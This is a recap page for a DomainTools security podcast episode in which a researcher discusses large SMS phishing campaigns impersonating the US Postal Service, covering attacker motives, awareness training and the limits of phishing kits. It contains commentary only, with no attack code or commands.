image of breaking badness
Breaking Badness
Breaking Badness

[Special Report] Father Phishmas, Give Us The Money

This week’s episode of Breaking Badness focuses on the recent phishing attacks against the United States Postal Service (USPS) and the research DomainTools recently shared on the blog:  

Merry Phishmas: Beware US Postal Service Phishing During the Holidays

Return to Sender – A Brief Analysis of a US Postal Service Smishing Campaign

  • We are joined by @nullcookies on this special episode of Breaking Badness where we discuss the recent smishing campaigns targeting the United States Postal Service (USPS) 
  • He polled friends and family recently if they had received a USPS text recently and all confirmed yes. He can’t think of an example of something more prevalent in his career to this point
  • This is one of the more fascinating and impressive phishing campaigns he’s seen in a long time
  • Even if you went back to the early-mid 00s in the “golden age” of phishing, they would be impressed by the deliverability and volume of what’s happening today 
  • For this discussion, spam is really good at very large scales (it’s also delicious) 
  • We’re seeing this influx of phishing because blocking it isn’t quite as developed
    • It takes time for platforms to catch up and @nullcookies thinks there will be improvements – the problem is understood and they’re working on it 
    • But in the meantime, these malicious messages will continue and he agrees that it will get worse before it gets better 
    • In our community, we go toward cynicism and pessimism, but @nullcookies believes there is hope on the horizon. There are very talented people working on this problem
    • Companies like WMC Global are killing it with their phishing analysis 
    • Researchers like Gonza – @nullcookies can’t wait to see what they do 
    • We can hope to see incremental improvements 
    • M3AAWG is another entity doing really great work on this 
  • We’re in a war of attrition and creativity – there’s a constant ebb and flow of cyber criminals coming up with these creative ways to steal from people
    • There’s reason to be concerned, but we can respond to those shifts and come up with creative ideas to shut it down, or at the very least, slow it down – we can at least hold the line 
  • Smishing defined
    • In the context here, it’s a malicious URL going to a phishing domain 
    • They were traditionally delivered via email, but in this instance it’s SMS 
  • Use of ChatGPT or not?
    • Why in Return to Sender, the attacker did not likely use ChatGPT
    • There are a lot of ways to abuse generative AI
    • But it just wasn’t needed at this point yet, is the assumption on why it wasn’t used 
    • In the article, it’s pointed out that Google Translate was used to clone a page – services like that, even if there’s a wide language barrier, they’re usually writing it
    • You also have threat actors who iterate and tweak the content because they’re interested in the success rate of their spam 
    • If English is not your proficient language, you could write a prompt into ChatGPT or you could write it in your language of choice and have another platform translate it for you (machine translation) 
    • Phishing actors and spammers also share information and templates 
    • There’s lots of ways they can blend into their environment 
    • It used to be effective to say “look for broken language” to avoid getting scammed, but what does the future of awareness training look like?
      • Tim will say, you look at the domain names, and in the examples we have, they’re not what you’d expect and that seems like a good place to start in training 
      • BUT @nullcookies wouldn’t trust URLs – we need more pervasive skepticism 
      • The tools that spammers have now to make their fraud more convincing are ions more convincing than they were even a few years ago, so skepticism has to be taught and unfortunately we’ll always need to be on our back foot responding to this because there are so many ways to deceive a human being 
      • Phishing is both primal in that it exploits what makes people human, but advanced in its technological means 
  • This campaign is one @nullcookies can’t compare to anything in his career – but why the USPS?
    • It’s an impressive threat actor for sure
    • The volume of their sending capability is impressive 
    • But the targeting of the postal service – it’s about as trusted of a brand as you can get today
    • It’s role is foundational – successful and timely delivery makes society functional 
    • The environmental factor: think about the pandemic and the spike in shipping we saw – and even now especially considering the holidays are approaching 
    • Another thing to consider is the uptick in package theft – people have deliveries waiting – in short, people want their stuff 
    • Effective spam is a form of deception – they’re trying to use a tactic to short circuit your critical thinking so the urge to not “lose your stuff” is powerful
    • You’ve got situations where people are afraid of package theft 
    • We could do a whole separate episode on package theft, but concerns surrounding installing a video doorbell
    • But it’s a war of creativity – all these factors create a confluence – and it all draws from human psychology and avoiding discomfort 
    • Services like these also use SMS for updates on delivery – nothing wrong with that and it serves a function, but if you have a target, more familiarity increase the chances of someone being deceived 
  • Phishing kits are difficult to perfect
    • The absolute top tier kits – you’ll never get a sample because they are so targeted and they will be deployed for such a short amount of time – the chance of any artifacts collected is low 
    • But mistakes are made that can be used to track them or identify those behind them 
    • For generic phishes, it’s easy to clone a website and set up the PHP processor that will send the stolen data to the attacker-controller server, but phishing kits and campaigns, by virtue of them being so public, they will reveal information that the actors don’t want to have revealed 
  • What about bring-your-own-device scenarios at work? How do you mitigate that?
    • It won’t take away the truth of fraud and phishing – anyone can fall victim to a phish – for @nullcookies, it’s less the device itself and the person and knowing these contingencies will occur 
    • We all need to plan for this to happen because it WILL happen 
    • There should be no shame in admitting this, but we need to learn from the mistake and talk to people about how to avoid it – it’s about protecting people from fraud 

This Week’s Hoodie/Goodie Scale

Hoodie Rating: 

Tay: 4.83/10

Tim: 5.5/10

@nullcookies: 8/10

That’s about all we have for this week, you can find us on Twitter @domaintools, all of the articles mentioned in our podcast will always be included on our podcast recap. Catch us Wednesdays at 9 AM Pacific time when we publish our next podcast and blog.

*A special thanks to John Roderick for our incredible podcast music!